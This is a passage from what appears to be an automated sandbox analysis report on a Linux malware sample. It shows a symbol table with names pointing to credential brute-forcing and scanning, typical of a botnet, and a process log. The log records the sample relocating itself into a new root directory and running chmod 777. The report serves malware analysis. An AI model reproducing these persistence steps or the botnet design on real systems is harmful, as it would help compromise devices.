        object.2636.symtab0x2b92424OBJECT<unknown>DEFAULT10
        open.symtab0x17a5092FUNC<unknown>DEFAULT2
        open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        opendir.symtab0x17c80252FUNC<unknown>DEFAULT2
        opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        p.2553.symtab0x2b0200OBJECT<unknown>DEFAULT9
        password_size.symtab0x2b9884OBJECT<unknown>DEFAULT10
        passwords.symtab0x2b11428OBJECT<unknown>DEFAULT9
        prctl.symtab0x17abc48FUNC<unknown>DEFAULT2
        prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        prefix.4141.symtab0x2205c12OBJECT<unknown>DEFAULT4
        process_retrieve_lines.symtab0x1347c460FUNC<unknown>DEFAULT2
        psk.symtab0x2b1304OBJECT<unknown>DEFAULT9
        qual_chars.4147.symtab0x2207020OBJECT<unknown>DEFAULT4
        raise.symtab0x1d12c24FUNC<unknown>DEFAULT2
        raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        rand.symtab0x19fc04FUNC<unknown>DEFAULT2
        rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        rand_new.symtab0x1020088FUNC<unknown>DEFAULT2
        rand_string.symtab0x102b4152FUNC<unknown>DEFAULT2
        random.symtab0x19fc4124FUNC<unknown>DEFAULT2
        random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        random_poly_info.symtab0x22c6040OBJECT<unknown>DEFAULT4
        random_r.symtab0x1a2a0144FUNC<unknown>DEFAULT2
        random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        randtbl.symtab0x2b87c128OBJECT<unknown>DEFAULT9
        read.symtab0x17aec44FUNC<unknown>DEFAULT2
        read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        readdir.symtab0x17d7c208FUNC<unknown>DEFAULT2
        readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        readlink.symtab0x17b1844FUNC<unknown>DEFAULT2
        readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        realloc.symtab0x19b18280FUNC<unknown>DEFAULT2
        realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        recv.symtab0x1963c44FUNC<unknown>DEFAULT2
        recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        recvfrom.symtab0x1966852FUNC<unknown>DEFAULT2
        recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        report_working.symtab0x103ac480FUNC<unknown>DEFAULT2
        retr_bins.symtab0x2b52c192OBJECT<unknown>DEFAULT9
        retr_binzz.symtab0x2b13840OBJECT<unknown>DEFAULT9
        retrbin_c0unt.symtab0x2b1344OBJECT<unknown>DEFAULT9
        retrbin_count.symtab0x2b5281OBJECT<unknown>DEFAULT9
        retrieve_entry.symtab0xbc7868FUNC<unknown>DEFAULT2
        retrieve_opt_ipv4.symtab0x85a892FUNC<unknown>DEFAULT2
        retrieve_opt_num.symtab0x8604104FUNC<unknown>DEFAULT2
        retrieve_opt_str.symtab0x82d868FUNC<unknown>DEFAULT2
        rsck.symtab0x2c18c4OBJECT<unknown>DEFAULT10
        s.symtab0x2c1cc4OBJECT<unknown>DEFAULT10
        sbrk.symtab0x1b6b888FUNC<unknown>DEFAULT2
        sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        scan.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        scan_pid.symtab0x2b9744OBJECT<unknown>DEFAULT10
        scanner_raw_buf.symtab0x2c19040OBJECT<unknown>DEFAULT10
        select.symtab0x17b4448FUNC<unknown>DEFAULT2
        select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        send.symtab0x1969c44FUNC<unknown>DEFAULT2
        send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        send_str.symtab0x1034c96FUNC<unknown>DEFAULT2
        sendto.symtab0x196c852FUNC<unknown>DEFAULT2
        sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        set.symtab0x2b02837OBJECT<unknown>DEFAULT9
        setsockopt.symtab0x196fc48FUNC<unknown>DEFAULT2
        setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        setstate.symtab0x1a040140FUNC<unknown>DEFAULT2
        setstate_r.symtab0x1a1e0192FUNC<unknown>DEFAULT2
        setup_connection.symtab0x13900224FUNC<unknown>DEFAULT2
        sigaction.symtab0x1b17c228FUNC<unknown>DEFAULT2
        sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        signal.symtab0x19758184FUNC<unknown>DEFAULT2
        signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        sigprocmask.symtab0x1b71084FUNC<unknown>DEFAULT2
        sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        single_read_until.symtab0x13648232FUNC<unknown>DEFAULT2
        sleep.symtab0x1a8d0420FUNC<unknown>DEFAULT2
        sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        snprintf.symtab0x17e8c48FUNC<unknown>DEFAULT2
        snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        socket.symtab0x1972c44FUNC<unknown>DEFAULT2
        socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        spec_and_mask.4146.symtab0x2208416OBJECT<unknown>DEFAULT4
        spec_base.4140.symtab0x220687OBJECT<unknown>DEFAULT4
        spec_chars.4143.symtab0x220b021OBJECT<unknown>DEFAULT4
        spec_flags.4142.symtab0x220c88OBJECT<unknown>DEFAULT4
        spec_or_mask.4145.symtab0x2209416OBJECT<unknown>DEFAULT4
        spec_ranges.4144.symtab0x220a49OBJECT<unknown>DEFAULT4
        sprintf.symtab0x17ebc52FUNC<unknown>DEFAULT2
        sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        srand.symtab0x1a164124FUNC<unknown>DEFAULT2
        srandom.symtab0x1a164124FUNC<unknown>DEFAULT2
        srandom_r.symtab0x1a330204FUNC<unknown>DEFAULT2
        start.symtab0x2b9444OBJECT<unknown>DEFAULT10
        start.symtab0x2c1c44OBJECT<unknown>DEFAULT10
        start.symtab0x2b93c4OBJECT<unknown>DEFAULT10
        state.symtab0x2b98c2048OBJECT<unknown>DEFAULT10
        stderr.symtab0x2b5f44OBJECT<unknown>DEFAULT9
        stdin.symtab0x2b5ec4OBJECT<unknown>DEFAULT9
        stdout.symtab0x2b5f04OBJECT<unknown>DEFAULT9
        strcat.symtab0x1915040FUNC<unknown>DEFAULT2
        strcat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        strerror_r.symtab0x19364232FUNC<unknown>DEFAULT2
        strlen.symtab0x190f096FUNC<unknown>DEFAULT2
        No network behavior found

        System Behavior

        Start time:05:14:18
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:/tmp/Z8xEavXrld
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:18
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:18
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:18
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:19
        Start date:06/08/2022
        Path:/bin/sh
        Arguments:sh -c "mkdir /rx05a34hf0/ && >/rx05a34hf0/rx05a34hf0 && cd /rx05a34hf0/ >/dev/null"
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
        Start time:05:14:19
        Start date:06/08/2022
        Path:/bin/sh
        Arguments:n/a
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
        Start time:05:14:19
        Start date:06/08/2022
        Path:/usr/bin/mkdir
        Arguments:mkdir /rx05a34hf0/
        File size:88408 bytes
        MD5 hash:088c9d1df5a28ed16c726eca15964cb7
        Start time:05:14:19
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:19
        Start date:06/08/2022
        Path:/bin/sh
        Arguments:sh -c "mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0 && chmod 777 /rx05a34hf0/rx05a34hf0 >/dev/null"
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
        Start time:05:14:19
        Start date:06/08/2022
        Path:/bin/sh
        Arguments:n/a
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
        Start time:05:14:19
        Start date:06/08/2022
        Path:/usr/bin/mv
        Arguments:mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0
        File size:149888 bytes
        MD5 hash:504f0590fa482d4da070a702260e3716
        Start time:05:14:19
        Start date:06/08/2022
        Path:/bin/sh
        Arguments:n/a
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
        Start time:05:14:19
        Start date:06/08/2022
        Path:/usr/bin/chmod
        Arguments:chmod 777 /rx05a34hf0/rx05a34hf0
        File size:63864 bytes
        MD5 hash:739483b900c045ae1374d6f53a86a279
        Start time:05:14:19
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:19
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:19
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
        Start time:05:14:19
        Start date:06/08/2022
        Path:/tmp/Z8xEavXrld
        Arguments:n/a
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1